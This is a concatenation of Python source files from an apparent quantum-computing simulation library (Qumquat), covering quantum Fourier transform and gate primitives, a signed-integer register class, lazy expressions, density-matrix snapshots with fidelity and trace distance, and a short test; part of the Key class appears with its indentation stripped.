        d = Expression(d, self)
        if key.key in d.keys:
            raise SyntaxError("Can't modify target based on expression that depends on target.")
        def branchesEqual(b1, b2):
            # NOTE: loop variable shadows the outer `key` parameter (harmless)
            for key in b1.keys():
                if key == "amp": continue
                if b1[key] != b2[key]: return False
            return True
        newbranches = []
        def insert(branch):
            # merge into an existing equal branch instead of duplicating
            for existingbranch in newbranches:
                if branchesEqual(branch, existingbranch):
                    existingbranch["amp"] += branch["amp"]
                    return
            newbranches.append(branch)
        goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
        for branch in self.branches:
            if not goodbranch(branch):
                insert(branch)
            else:
                dval = d.c(branch)
                if dval != int(dval) or int(dval) <= 1:
                    raise ValueError("QFT must be over a positive integer")
                # base of the length-d block containing the current value
                base = branch[key.index()] - (branch[key.index()] % dval)
                for i in range(int(dval)):
                    newbranch = copy.deepcopy(branch)
                    newbranch['amp'] *= 1/math.sqrt(dval)
                    if inverse:
                        newbranch['amp'] *= cmath.exp(-int(branch[key.index()])*i\
                                *2j*math.pi/int(dval))
                    else:
                        newbranch['amp'] *= cmath.exp(int(branch[key.index()])*i\
                                *2j*math.pi/int(dval))
                    newbranch[key.index()] = es_int(i + base)
                    newbranch[key.index()].sign = branch[key.index()].sign
                    insert(newbranch)
        self.branches = newbranches
        self.prune()
    def qft_inv(self, key, d, inverse=False):
        """Inverse QFT is the QFT with the phase sign flipped."""
        self.qft(key, d, inverse=(not inverse))
    ######################################## Primitives
    # for things like +=, *=, etc
    def oper(self, key, expr, do, undo):
        """Apply the reversible update `do` to `key` on controlled branches;
        `undo` is recorded so the action can be inverted (queueable)."""
        if self.queue_action('oper', key, expr, do, undo): return
        self.assert_mutable(key)
        if key.key in expr.keys:
            raise SyntaxError("Can't modify target based on expression that depends on target.")
        for branch in self.controlled_branches():
            branch[key.index()] = do(branch)
    def oper_inv(self, key, expr, do, undo):
        """Invert by swapping do/undo."""
        self.oper(key, expr, undo, do)
    def phase(self, theta):
        """Multiply controlled branches by e^(i*theta); theta may be an
        expression evaluated per branch (queueable)."""
        if self.queue_action('phase', theta): return
        theta = Expression(theta, self)
        for branch in self.controlled_branches():
            branch['amp'] *= cmath.exp(1j*float(theta.c(branch)))
    def phase_inv(self, theta):
        """Inverse phase: negate the angle."""
        self.phase(-theta)
    def phase_pi(self, theta): self.phase(theta*math.pi)
    def phase_2pi(self, theta): self.phase(2*theta*math.pi)
    def cnot(self, key, idx1, idx2):
        """Flip bit idx2 of `key` wherever bit idx1 is set (queueable)."""
        if self.queue_action('cnot', key, idx1, idx2): return
        self.assert_mutable(key)
        idx1 = Expression(idx1, self)
        idx2 = Expression(idx2, self)
        if key.key in idx1.keys or key.key in idx2.keys:
            raise SyntaxError("Can't modify target based on expression that depends on target.")
        for branch in self.controlled_branches():
            v_idx1 = idx1.c(branch)
            v_idx2 = idx2.c(branch)
            if v_idx1 == v_idx2: raise ValueError("Can't perform CNOT from index to itself.")
            if branch[key.index()][v_idx1] == 1:
                branch[key.index()][v_idx2] = 1 - branch[key.index()][v_idx2]
    def cnot_inv(self, key, idx1, idx2):
        """CNOT is self-inverse."""
        self.cnot(key, idx1, idx2)
--- FILE SEPARATOR ---
import math
import inspect
# explicitly signed int
class es_int(object):
    """Explicitly signed integer: stores sign and magnitude separately, so
    +0 and -0 are distinct values (needed for register bit semantics).

    Indexing reads/writes bits of the magnitude; index -1 is the sign bit.
    """
    def __init__(self, val):
        if isinstance(val, es_int):
            self.sign = val.sign
            self.mag = val.mag
        elif isinstance(val, int):
            self.sign = -1 if val < 0 else 1
            self.mag = abs(val)
        elif isinstance(val, float):
            # str() check distinguishes -0.0 from 0.0 (they compare equal)
            self.sign = -1 if "-" in str(val) else 1
            self.mag = int(abs(val))
        else: raise TypeError
    # arithmetic converts through int and re-wraps (note: loses -0 distinction)
    def __add__(self, expr): return es_int(int(self) + int(expr))
    def __sub__(self, expr): return es_int(int(self) - int(expr))
    def __mul__(self, expr): return es_int(int(self) * int(expr))
    def __radd__(self, expr): return self + expr
    def __rsub__(self, expr): return -self + expr
    def __rmul__(self, expr): return self * expr
    def __truediv__(self, expr): return float(self) / float(expr)
    def __floordiv__(self, expr): return es_int(int(self) // int(expr))
    def __mod__(self, expr): return es_int(int(self) % int(expr))
    def __rtruediv__(self, expr): return float(expr) / float(self)
    def __rfloordiv__(self, expr): return es_int(int(expr) // int(self))
    def __rmod__(self, expr): return es_int(int(expr) % int(self))
    def __pow__(self, expr, *modulo):
        if not isinstance(expr, int) and not isinstance(expr, es_int):
            raise TypeError("Pow only supported for integers. Cast to float first.")
        return es_int(pow(int(self),int(expr),*modulo))
    def __rpow__(self, expr): return pow(es_int(expr), self)
    # defined on the magnitude, but preserves sign
    def __lshift__(self, expr): return es_int(self.sign*(int(abs(self)) << int(expr)))
    def __rshift__(self, expr): return es_int(self.sign*(int(abs(self)) >> int(expr)))
    def __rlshift__(self, expr): return es_int(self.sign*(int(abs(expr)) << int(self)))
    def __rrshift__(self, expr): return es_int(self.sign*(int(abs(expr)) >> int(self)))
    # defined on the magnitude, always unsigned
    def __and__(self, expr): return es_int(self.mag & abs(int(expr)))
    def __xor__(self, expr):
        # xor combines magnitudes and multiplies signs
        expr = es_int(expr)
        return es_int(self.mag ^ expr.mag) * self.sign * expr.sign
    def __or__(self, expr): return es_int(self.mag | abs(int(expr)))
    def __rand__(self, expr): return self & expr
    def __rxor__(self, expr): return self ^ expr
    def __ror__(self, expr): return self | expr
    def __neg__(self):
        # negation flips the sign bit only (so -(+0) == -0)
        out = es_int(self)
        out.sign *= -1
        return out
    def __abs__(self): return es_int(self.mag)
    def __complex__(self): return complex(self.sign * self.mag)
    def __int__(self): return self.sign * self.mag
    def __float__(self): return float(self.sign * self.mag)
    # For example: for i in range(-1, len(x)): print(x)
    def __len__(self):
        # number of bits needed to represent the magnitude
        i = 0
        while 2**i <= self.mag: i += 1
        return i
    def __bool__(self):
        # both +0 and -0 are falsy
        return self.mag > 0
    def __getitem__(self, index):
        if index == -1: # -1 is sign bit
            return es_int(1 if self.sign == -1 else 0)
        else:
            return es_int(1 if (self.mag & (1 << index)) else 0)
    def __setitem__(self, key, value):
        """Set bit `key` of the magnitude to value mod 2; key == -1 toggles
        the sign bit instead."""
        key = int(key)
        if key < -1: raise IndexError
        if self[key] == (int(value) % 2): return  # bit already correct
        if key == -1:
            self.sign *= -1
            return
        if self[key]:
            self.mag -= 2**key
            # NOTE(review): mag can only go negative if internal state was
            # inconsistent; this re-normalizes by flipping the sign
            if self.mag < 0:
                self.mag = abs(self.mag)
                self.sign *= -1
        else:
            self.mag += 2**key
    def __repr__(self): return str(self)
    def __str__(self): return ("+" if self.sign > 0 else "-") + str(int(self.mag))
    def __lt__(self, expr): return int(self) < int(expr)
    def __le__(self, expr): return int(self) <= int(expr)
    def __gt__(self, expr): return int(self) > int(expr)
    def __ge__(self, expr): return int(self) >= int(expr)
    def __eq__(self, expr):
        # sign-sensitive equality: +0 != -0 here, unlike int comparison
        expr = es_int(expr)
        return self.mag == expr.mag and self.sign == expr.sign
    def __round__(self): return self
    # hashable
    def __hash__(self):
        return self.mag*2 + (1 if self.sign == 1 else 0)
#####################################
class IrrevError(Exception):
    """Raised when a requested quantum operation cannot be reversed."""

def callPath():
    """Return "File <name>, line <n>" describing the caller's caller."""
    caller = inspect.currentframe().f_back.f_back
    return "File " + caller.f_code.co_filename + ", line " + str(caller.f_lineno)

def irrevError(x, cond, path):
    """Pass `x` through unless `cond` holds, in which case raise IrrevError
    tagged with the source location `path`."""
    if cond:
        raise IrrevError("Specified operation is not reversible. ("+path+")")
    return x
####################################
class Key():
def __init__(self, qq, val=None):
self.qq = qq
if val is None:
self.key = qq.key_count
qq.key_count += 1
qq.key_dict[self.key] = None
else:
self.key = val
self.partnerCache = None
def __repr__(self):
status = "unallocated"
if self.allocated(): status = "allocated"
return "<Qumquat Key: "+str(self.key)+", "+status+">"
def allocated(self):
return self.qq.key_dict[self.key] is not None
# for debug - print short identifying string
def short(self):
status = "u"
if self.allocated(): status = "a"
return str(self.key)+status
def pile(self):
for pile in self.qq.pile_stack_qq:
if any([self.key == key.key for key in pile]):
return pile
return None
    def partner(self):
        """Return the key this key will be uncomputed into.

        Allocated keys are their own partner. For an unallocated key the
        partner is looked up in the enclosing garbage pile and cached.
        """
        if self.allocated(): return self
        else:
            if self.partnerCache is not None:
                return self.partnerCache
            pile = self.pile()
            if pile is None:
                raise SyntaxError("Attempted to read un-allocated key.")
            i = 0 # partner index
            # NOTE(review): `i` counts the unallocated keys preceding self in
            # the pile, then indexes the pile directly — this appears to pair
            # the n-th unallocated key with pile[n]; confirm against the
            # garbage collector's pile layout.
            for key in pile:
                if key.key == self.key: break
                if key.allocated(): continue
                i += 1
            if not pile[i].allocated():
                raise SyntaxError("Garbage collector error: ran out of registers to uncompute.")
            self.partnerCache = pile[i]
            return pile[i]
def index(self):
if not self.allocated():
partner = self.partner()
return self.partner().index()
return self.qq.key_dict[self.key]
############################ operations (a + b) forward to expressions
# Reading a key in an arithmetic context never mutates the register:
# every operator wraps self in an Expression and delegates to it, building
# a lazy classical expression over branch values.
def __add__(self, expr): return Expression(self) + expr
def __radd__(self, expr): return expr + Expression(self)
def __sub__(self, expr): return Expression(self) - expr
def __rsub__(self, expr): return expr - Expression(self)
def __mul__(self, expr): return Expression(self) * expr
def __rmul__(self, expr): return expr * Expression(self)
def __truediv__(self, expr): return Expression(self) / expr
def __rtruediv__(self, expr): return expr / Expression(self)
def __floordiv__(self, expr): return Expression(self) // expr
def __rfloordiv__(self, expr): return expr // Expression(self)
def __mod__(self, expr): return Expression(self) % expr
def __rmod__(self, expr): return expr % Expression(self)
def __pow__(self, expr): return pow(Expression(self), expr)
def __rpow__(self, expr): return pow(expr, Expression(self))
def __and__(self, expr): return Expression(self) & expr
def __rand__(self, expr): return expr & Expression(self)
def __xor__(self, expr): return Expression(self) ^ expr
def __rxor__(self, expr): return expr ^ Expression(self)
def __or__(self, expr): return Expression(self) | expr
def __ror__(self, expr): return expr | Expression(self)
def __neg__(self): return -Expression(self)
def __abs__(self): return abs(Expression(self))
def __lshift__(self, expr): return Expression(self) << expr
def __rshift__(self, expr): return Expression(self) >> expr
def __rlshift__(self, expr): return expr << Expression(self)
def __rrshift__(self, expr): return expr >> Expression(self)
def __complex__(self): return complex(Expression(self))
def __int__(self): return int(Expression(self))
def __float__(self): return float(Expression(self))
def len(self): return Expression(self).len()
def __getitem__(self, index): return Expression(self)[index]
# Comparisons also produce lazy integer-valued Expressions (not bools).
def __lt__(self, expr): return Expression(self) < expr
def __le__(self, expr): return Expression(self) <= expr
def __gt__(self, expr): return Expression(self) > expr
def __ge__(self, expr): return Expression(self) >= expr
def __eq__(self, expr): return Expression(self) == expr
def __ne__(self, expr): return Expression(self) != expr
# Use qq.round(expr), etc.
# def round(self): Expression(self).round()
# def floor(self): Expression(self).floor()
# def ceil(self): Expression(self).ceil()
################################## statements (a += b) forward to qq.op()
def __iadd__(self, expr):
    """Reversible in-place addition: schedule `self += expr` via qq.oper.

    Only integer-valued expressions are allowed; a float increment would
    make the register value a float.
    """
    rhs = Expression(expr, self.qq)
    if rhs.float: raise ValueError("Can't add float to register.")
    forward = lambda b: b[self.index()] + rhs.c(b)
    backward = lambda b: b[self.index()] - rhs.c(b)
    self.qq.oper(self, rhs, forward, backward)
    return self
def __isub__(self, expr):
    """Reversible in-place subtraction (integer expressions only)."""
    expr = Expression(expr, self.qq)
    if expr.float: raise ValueError("Can't subtract float from register.")
    do = lambda b: b[self.index()] - expr.c(b)
    undo = lambda b: b[self.index()] + expr.c(b)
    self.qq.oper(self, expr, do, undo)
    return self
def __imul__(self, expr):
    """Reversible in-place multiplication; multiplying by 0 is flagged."""
    # callPath() records where the user invoked the op so irreversibility
    # errors can point at the offending source line.
    path = callPath()
    expr = Expression(expr, self.qq)
    if expr.float: raise ValueError("Can't multiply register by float.")
    # Multiplying by 0 destroys information; the undo requires exact
    # divisibility. Both are guarded via irrevError.
    do = lambda b: b[self.index()] * irrevError(expr.c(b), expr.c(b) == 0, path)
    undo = lambda b: irrevError(b[self.index()] // expr.c(b), b[self.index()] % expr.c(b) != 0, path)
    self.qq.oper(self, expr, do, undo)
    return self
def __itruediv__(self, expr):
    """Disallowed: true division could produce a float register."""
    raise SyntaxError("True division might make register a float. Use floor division: //=")
def __ifloordiv__(self, expr):
    """Reversible in-place floor division; only exact divisions allowed."""
    path = callPath()
    expr = Expression(expr, self.qq)
    # Floor division is only reversible when the value divides exactly.
    do = lambda b: irrevError(b[self.index()] // expr.c(b), b[self.index()] % expr.c(b) != 0, path)
    undo = lambda b: b[self.index()] * irrevError(expr.c(b), expr.c(b) == 0, path)
    self.qq.oper(self, expr, do, undo)
    return self
def __ixor__(self, expr):
    """Reversible in-place XOR; XOR is its own inverse, so do == undo."""
    expr = Expression(expr, self.qq)
    do = lambda b: b[self.index()] ^ expr.c(b)
    self.qq.oper(self, expr, do, do)
    return self
def __ipow__(self, expr):
    """Reversible in-place exponentiation by a positive integer power."""
    path = callPath()
    expr = Expression(expr, self.qq)
    def check(b):
        # True when the forward power would be irreversible or float-valued.
        if expr.float: return True
        v = expr.c(b)
        if int(v) != v: return True # fractional powers create floats
        if v <= 0: return True # negative powers create floats, 0 power is irreversible
        return False
    def check_inv(b):
        # True when the inverse (v-th root) is not exactly representable.
        if expr.float: return True
        v = expr.c(b)
        if int(v) != v: return True # fractional powers create floats
        if v <= 0: return True # negative powers create floats, 0 power is irreversible
        out = float(b[self.index()])**float(1/v)
        if int(out) != out: return True # must be an exact v-th root
        return False
    do = lambda b: irrevError((b[self.index()]**(expr.c(b))), check(b), path)
    undo = lambda b: irrevError(es_int(int(b[self.index()])**(1/expr.c(b))), check_inv(b), path)
    self.qq.oper(self, expr, do, undo)
    return self
def __ilshift__(self, expr):
    """Reversible in-place left shift.

    NOTE(review): unlike *= and //=, the undo (right shift) has no
    irrevError guard; confirm low bits can never be set on undo.
    """
    expr = Expression(expr, self.qq)
    do = lambda b: b[self.index()] << expr.c(b)
    undo = lambda b: b[self.index()] >> expr.c(b)
    self.qq.oper(self, expr, do, undo)
    return self
######################### Irreversible operations
def assert_garbage(self, op):
    """Raise SyntaxError unless a garbage-collector pile is active.

    Irreversible operations dump their lost information into the current
    pile, so one must exist before they are permitted.
    """
    if not self.qq.pile_stack_py:
        raise SyntaxError("Need garbage collector to perform irreversible operation "+op+".")
def assign(self, value):
    """Irreversibly overwrite the register with value (needs garbage pile)."""
    self.assert_garbage("assign")
    # Compute the difference into a fresh (garbage) register, then add it.
    diff = self.qq.reg(value - self)
    self += diff
def __setitem__(self, key, value):
    """Irreversibly set bit `key` of the register to value mod 2."""
    self.assert_garbage("setitem")
    value = value % 2
    # key == -1 addresses the sign bit; flipping it negates the register.
    if key == -1: self.assign(-self*(self[key] != value))
    else: self.assign(self + (1 - 2*self[-1])*(value - self[key])*2**key)
    return self
def __imod__(self, expr):
    """Irreversible in-place modulo (needs garbage pile)."""
    self.assert_garbage("modset")
    self.assign(self % expr)
    return self
def __irshift__(self, expr):
    """Irreversible in-place right shift (needs garbage pile)."""
    self.assert_garbage("rshiftset")
    self.assign(self >> expr)
    return self
def __iand__(self, expr):
    """Irreversible in-place AND (needs garbage pile)."""
    self.assert_garbage("andset")
    self.assign(self & expr)
    return self
def __ior__(self, expr):
    """Irreversible in-place OR (needs garbage pile)."""
    self.assert_garbage("orset")
    self.assign(self | expr)
    return self
######################### Shortcuts
def qft(self, d):
    """Apply the dimension-d quantum Fourier transform to this register."""
    self.qq.qft(self, d)
def had(self, idx):
    """Hadamard the bit at index idx of this register."""
    self.qq.had(self, idx)
def cnot(self, idx1, idx2):
    """CNOT within this register: control bit idx1, target bit idx2."""
    self.qq.cnot(self, idx1, idx2)
def clean(self, expr):
    """Uncompute and deallocate: assert the register equals expr, free it."""
    self.qq.clean(self, expr)
def init(self, val):
    """Initialize this (zero) register to val."""
    self.qq.init(self, val)
def perp(self, val):
    """Context manager yielding a flag Expression that marks the component
    of the state perpendicular to the superposition described by val.

    Implementation: un-initialize val, increment a fresh bit on the nonzero
    residue, re-initialize; __exit__ runs the mirror image and cleans the
    bit. NOTE(review): assumes val round-trips exactly through init/inv —
    confirm against qq.init semantics.
    """
    class WrapPerp():
        def __enter__(s):
            s.bit = self.qq.reg(0)
            with self.qq.inv(): self.init(val)
            with self.qq.control(self != 0): s.bit += 1
            self.init(val)
            return Expression(s.bit)
        def __exit__(s, *args):
            # Mirror of __enter__ so the flag bit returns to 0.
            with self.qq.inv(): self.init(val)
            with self.qq.control(self != 0): s.bit -= 1
            self.init(val)
            s.bit.clean(0)
    return WrapPerp()
###################################################################
# Holds onto lambda expressions that are functions of
# quantum registers (which are always es_int). Can be either int or float.
class Expression(object):
    """A lazy classical expression over quantum register values.

    An Expression wraps a callable ``c(branch) -> value`` evaluating the
    expression on one branch of the superposition, together with:
      - ``keys``:  the set of register keys the expression reads,
      - ``float``: whether evaluation may produce a float,
      - ``qq``:    the owning qumquat instance.
    Operators compose expressions without evaluating anything; comparisons
    yield integer-valued (0/1) Expressions, so Expression is intentionally
    not usable as a dict key or set element.
    """
    def __init__(self, val, qq=None):
        # Copy-construct from an existing Expression.
        if isinstance(val, Expression):
            self.keys = val.keys
            self.c = val.c
            self.float = val.float
            qq = val.qq
        # A register key evaluates to that register's branch value.
        if isinstance(val, Key):
            self.keys = set([val.key])
            self.c = lambda b: b[val.index()]
            self.float = False
            qq = val.qq
        if qq is None: raise ValueError
        self.qq = qq
        # Constants close over the literal value.
        if isinstance(val, int) or isinstance(val, es_int):
            self.keys = set([])
            self.c = lambda b: es_int(val)
            self.float = False
        if isinstance(val, float):
            self.keys = set([])
            self.c = lambda b: val
            self.float = True
        if not hasattr(self, "keys"):
            raise ValueError("Invalid expression of type " + str(type(val)))
    # private method
    def op(self, expr, c, floatmode="inherit"):
        """Combine self and expr with binary callable c.

        floatmode controls the float flag of the result:
          "inherit" -> is float if any parent is float
          "always"  -> always a float
          "never"   -> never a float
        """
        expr = Expression(expr, self.qq)
        newexpr = Expression(0, self.qq)
        newexpr.keys = set(self.keys) | set(expr.keys)
        if floatmode == "inherit":
            newexpr.float = self.float or expr.float
        if floatmode == "always": newexpr.float = True
        if floatmode == "never": newexpr.float = False
        if newexpr.float:
            # Cast both operands so int/float mixing is well-defined.
            newexpr.c = lambda b: c(float(self.c(b)), float(expr.c(b)))
        else:
            newexpr.c = lambda b: c(self.c(b), expr.c(b))
        return newexpr
    def __add__(self, expr): return self.op(expr, lambda x,y: x+y)
    def __sub__(self, expr): return self.op(expr, lambda x,y: x-y)
    def __mul__(self, expr): return self.op(expr, lambda x,y: x*y)
    def __radd__(self, expr): return self + expr
    def __rsub__(self, expr): return -self + expr
    def __rmul__(self, expr): return self * expr
    def __truediv__(self, expr): return self.op(expr, lambda x,y: x / y, "always")
    def __floordiv__(self, expr): return self.op(expr, lambda x,y: x // y)
    def __mod__(self, expr): return self.op(expr, lambda x,y: x % y)
    def __rtruediv__(self, expr): return self.op(expr, lambda x,y: y / x, "always")
    def __rfloordiv__(self, expr): return self.op(expr, lambda x,y: y // x)
    def __rmod__(self, expr): return self.op(expr, lambda x,y: y % x)
    def __pow__(self, expr): return self.op(expr, lambda x,y: x**y, "always")
    def __rpow__(self, expr): return pow(Expression(expr, self.qq), self)
    def __neg__(self):
        newexpr = Expression(self)
        newexpr.c = lambda b: -(self.c(b))
        return newexpr
    def __abs__(self):
        newexpr = Expression(self)
        newexpr.c = lambda b: abs(self.c(b))
        return newexpr
    ######################### Bitwise operations
    def __lshift__(self, expr): return self.op(expr, lambda x,y: x << y, "never")
    def __rshift__(self, expr): return self.op(expr, lambda x,y: x >> y, "never")
    def __and__(self, expr): return self.op(expr, lambda x,y: x & y, "never")
    def __xor__(self, expr): return self.op(expr, lambda x,y: x ^ y, "never")
    def __or__(self, expr): return self.op(expr, lambda x,y: x | y, "never")
    def __rlshift__(self, expr): return self.op(expr, lambda x,y: y << x, "never")
    def __rrshift__(self, expr): return self.op(expr, lambda x,y: y >> x, "never")
    def __rand__(self, expr): return self & expr
    def __rxor__(self, expr): return self ^ expr
    def __ror__(self, expr): return self | expr
    ######################### Getting bit values
    def len(self):
        """Length in bits (delegates to es_int's len); ints only."""
        if self.float: raise TypeError("Bit representations of floats not supported.")
        newexpr = Expression(self)
        newexpr.c = lambda b: es_int(len(self.c(b)))
        newexpr.float = False
        return newexpr
    def __getitem__(self, index):
        """Bit extraction; ints only."""
        if self.float: raise TypeError("Bit representations of floats not supported.")
        # Fix: pass the documented "never" floatmode. The original passed the
        # bogus positional value False and relied on the override below.
        newexpr = self.op(index, lambda x,y: x[y], "never")
        newexpr.float = False
        return newexpr
    ######################### Comparisons
    # should return int
    def __lt__(self, expr): return self.op(expr, lambda x,y: es_int(x < y), "never")
    def __le__(self, expr): return self.op(expr, lambda x,y: es_int(x <= y), "never")
    def __gt__(self, expr): return self.op(expr, lambda x,y: es_int(x > y), "never")
    def __ge__(self, expr): return self.op(expr, lambda x,y: es_int(x >= y), "never")
    def __eq__(self, expr): return self.op(expr, lambda x,y: es_int(x == y), "never")
    def __ne__(self, expr): return self.op(expr, lambda x,y: es_int(x != y), "never")
--- FILE SEPARATOR ---
from .qvars import *
# snapshot.py
# - get_numpy
# - snap
# - fidelity
# - trace_dist
class Snapshots:
    """Density-matrix snapshots of selected registers, plus metrics on them."""
    ################### Snapshots
    def get_numpy(self):
        """Import and return numpy, raising a friendly error when missing."""
        try:
            import numpy as np
        except ImportError:
            raise ImportError("Qumquat snapshots require numpy to be installed.")
        return np
    def snap(self, *regs):
        """Snapshot the reduced density matrix of the given registers.

        Returns a dict with:
          - "num_idxs": number of registers snapshotted,
          - "keys": basis labels (space-joined stringified register values),
          - "rho": matrix entries keyed "<key1>x<key2>".
        """
        self.get_numpy()  # early availability check only; value unused here
        # check that registers are not expressions
        idxs = []
        for reg in regs:
            if not isinstance(reg, Key):
                raise SyntaxError("Can only take snapshot of quantum register, not expression.")
            idxs.append(reg.index())
        # Branch equality on everything EXCEPT the snapshotted registers.
        def branchesEqualNonIdxs(b1, b2):
            for key in self.branches[b1].keys():
                if key == "amp": continue
                if key in idxs: continue
                if self.branches[b1][key] != self.branches[b2][key]: return False
            return True
        # Branch equality ON the snapshotted registers only.
        def branchesEqualIdxs(b1, b2):
            for idx in idxs:
                if self.branches[b1][idx] != self.branches[b2][idx]:
                    return False
            return True
        # sort branches into lists such that:
        # each list element has different values for idxs
        # each list element has the same value for non-idxs
        to_save = [[]]
        for branch in range(len(self.branches)):
            i = 0
            while i < len(to_save):
                found = False
                if len(to_save[i]) > 0 and not branchesEqualNonIdxs(to_save[i][0], branch):
                    i += 1
                    continue
                for saved in to_save[i]:
                    if branchesEqualIdxs(saved, branch):
                        found = True
                        break
                if not found:
                    to_save[i].append(branch)
                    break
                i += 1
            if i == len(to_save):
                to_save.append([branch])
        # assemble density matrix
        rho = {}
        keys = []
        for i in range(len(to_save)):
            for j in range(len(to_save[i])):
                for k in range(len(to_save[i])):
                    key1, key2 = [], []
                    for idx in idxs: key1.append(str(self.branches[to_save[i][j]][idx]))
                    for idx in idxs: key2.append(str(self.branches[to_save[i][k]][idx]))
                    key1, key2 = " ".join(key1), " ".join(key2)
                    if key1 not in keys: keys.append(key1)
                    if key2 not in keys: keys.append(key2)
                    key = key1 + "x" + key2
                    # rho[key1,key2] += amp_j * conj(amp_k), summed over
                    # groups — this traces out the un-snapshotted registers.
                    val = self.branches[to_save[i][j]]["amp"] * \
                        self.branches[to_save[i][k]]["amp"].conjugate()
                    if key in rho: rho[key] += val
                    else: rho[key] = val
        return {
            "num_idxs": len(idxs),
            "keys": keys,
            "rho": rho,
        }
    def fidelity(self, snap1, snap2):
        """Fidelity Tr[sqrt(sqrt(rho1) rho2 sqrt(rho1))] of two snapshots."""
        np = self.get_numpy()
        if snap1["num_idxs"] != snap2["num_idxs"]:
            raise ValueError("Snapshots are on different number of registers.")
        # Embed both density matrices into a common basis.
        keys = list(set(snap1["keys"]) | set(snap2["keys"]))
        rho1 = np.zeros((len(keys),len(keys))).astype(complex)
        rho2 = np.zeros((len(keys),len(keys))).astype(complex)
        for key in snap1["rho"].keys():
            key1, key2 = key.split("x")
            rho1[keys.index(key1)][keys.index(key2)] += snap1["rho"][key]
        for key in snap2["rho"].keys():
            key1, key2 = key.split("x")
            rho2[keys.index(key1)][keys.index(key2)] += snap2["rho"][key]
        # Matrix square root of rho1 via its (Hermitian) eigendecomposition.
        eigvals, eigs = np.linalg.eigh(rho1)
        sqrtrho1 = np.dot(np.dot(eigs, np.diag([np.sqrt(x) for x in eigvals])), eigs.conj().T)
        eigvals = np.linalg.eigvalsh(np.dot(np.dot(sqrtrho1, rho2), sqrtrho1))
        return float(np.real(np.sqrt(eigvals).sum()))
    def trace_dist(self, snap1, snap2):
        """Trace distance 0.5 * ||rho1 - rho2||_1 of two snapshots."""
        np = self.get_numpy()
        if snap1["num_idxs"] != snap2["num_idxs"]:
            raise ValueError("Snapshots are on different number of registers.")
        keys = list(set(snap1["keys"]) | set(snap2["keys"]))
        diff = np.zeros((len(keys),len(keys))).astype(complex)
        for key in snap1["rho"].keys():
            key1, key2 = key.split("x")
            diff[keys.index(key1)][keys.index(key2)] += snap1["rho"][key]
        for key in snap2["rho"].keys():
            key1, key2 = key.split("x")
            diff[keys.index(key1)][keys.index(key2)] -= snap2["rho"][key]
        # Sum of |eigenvalues| of the (Hermitian) difference is the 1-norm.
        eigs = np.linalg.eigvalsh(diff)
        return float(np.real(sum([abs(x) for x in eigs])/2))
--- FILE SEPARATOR ---
from .qvars import *
# utils.py
# - int, float, round, floor, ceil
# - trig, sqrt
# - qram
# - swap
class Utils:
    """Lift classical math (casting, rounding, trig, qram, swap) to Expressions.

    Every method accepts a plain Python value, a Key, or an Expression.
    Plain values are computed eagerly; Keys/Expressions produce a new lazy
    Expression with the float flag set appropriately.
    """
    ######################### Casting
    def int(self, expr):
        """Truncate expr to an integer-valued expression (es_int)."""
        if not isinstance(expr, Expression):
            if not isinstance(expr, Key): return int(expr)
            expr = Expression(expr, qq=self)
        newexpr = Expression(expr)
        newexpr.c = lambda b: es_int(expr.c(b))
        newexpr.float = False
        return newexpr
    def float(self, expr):
        """Cast expr to a float-valued expression."""
        if not isinstance(expr, Expression):
            if not isinstance(expr, Key): return float(expr)
            expr = Expression(expr, qq=self)
        newexpr = Expression(expr)
        newexpr.c = lambda b: float(expr.c(b))
        newexpr.float = True
        return newexpr
    ######################### Rounding
    def _to_int(self, expr, dunder, func):
        """Shared round/floor/ceil implementation.

        Plain values supporting `dunder` are handled eagerly with `func`;
        integer expressions pass through unchanged; float expressions are
        wrapped so `func` is applied branch-wise and cast back to es_int.
        """
        if not isinstance(expr, Expression):
            if hasattr(expr, dunder): return func(expr)
            expr = Expression(expr, qq=self)
        if not expr.float: return expr
        newexpr = Expression(expr)
        newexpr.c = lambda b: es_int(func(expr.c(b)))
        newexpr.float = False
        return newexpr
    def round(self, expr):
        """Round to nearest integer."""
        return self._to_int(expr, "__round__", round)
    def floor(self, expr):
        """Round down. (Bug fix: the eager path previously called bare
        `floor(...)`; use math.floor, as the lazy branch already did.)"""
        return self._to_int(expr, "__floor__", math.floor)
    def ceil(self, expr):
        """Round up. (Bug fix: likewise bare `ceil(...)` -> math.ceil.)"""
        return self._to_int(expr, "__ceil__", math.ceil)
    ######################### Trig, sqrt
    def _unary_float(self, expr, func):
        """Lift a real-valued math function to a float-valued Expression."""
        if not isinstance(expr, Expression):
            if not isinstance(expr, Key): return func(float(expr))
            expr = Expression(expr, qq=self)
        newexpr = Expression(expr)
        newexpr.c = lambda b: func(float(expr.c(b)))
        newexpr.float = True
        return newexpr
    def sin(self, expr): return self._unary_float(expr, math.sin)
    def cos(self, expr): return self._unary_float(expr, math.cos)
    def tan(self, expr): return self._unary_float(expr, math.tan)
    def asin(self, expr): return self._unary_float(expr, math.asin)
    def acos(self, expr): return self._unary_float(expr, math.acos)
    def atan(self, expr): return self._unary_float(expr, math.atan)
    def sqrt(self, expr): return self._unary_float(expr, math.sqrt)
    def exp(self, expr): return self._unary_float(expr, math.exp)
    ######################### QRAM
    def qram(self, dictionary, index):
        """Look up integer expression `index` in a dict/list of expressions.

        The result is float-valued if ANY stored value is a float.
        """
        if not isinstance(index, Expression): index = Expression(index, qq=self)
        if index.float:
            raise ValueError("QRAM keys must be integers, not floats.")
        # cast lists to dictionaries keyed by position
        if isinstance(dictionary, list):
            dictionary = {i:dictionary[i] for i in range(len(dictionary))}
        casted_dict = {}
        isFloat = False
        for key in dictionary.keys():
            expr = Expression(dictionary[key], qq=self)
            if expr.float: isFloat = True
            casted_dict[key] = expr
        newexpr = Expression(index)
        newexpr.c = lambda b: casted_dict[int(index.c(b))].c(b)
        newexpr.float = isFloat
        return newexpr
    ############ SWAP
    def swap(self, key1, key2):
        """Swap two registers using three reversible additions and a negation."""
        key1 -= key2 # a1 = a0-b0
        key2 += key1 # b1 = b0+a1 = a0
        key1 -= key2 # a2 = a1-b1 = -b0
        key1 *= -1
--- FILE SEPARATOR ---
import qumquat as qq
from qumquat.qvars import es_int
import matplotlib.pyplot as plt
import math
def test_init():
    # Register creation from ints, es_ints, superposition lists, and other
    # registers; clean() must uncompute each back to |0>.
    print("init")
    # ints and es_ints
    x = qq.reg(1)
    x.clean(es_int(1))
    x = qq.reg(1)
    x.clean(1)
    # superpositions
    x = qq.reg([1,es_int(2),3])
    x.clean([1,2,es_int(3)])
    # other variables
    x = qq.reg(range(5))
    y = qq.reg(x)
    z = qq.reg(x // 2)
    qq.print(x,y,z)
    z.clean(y // 2)
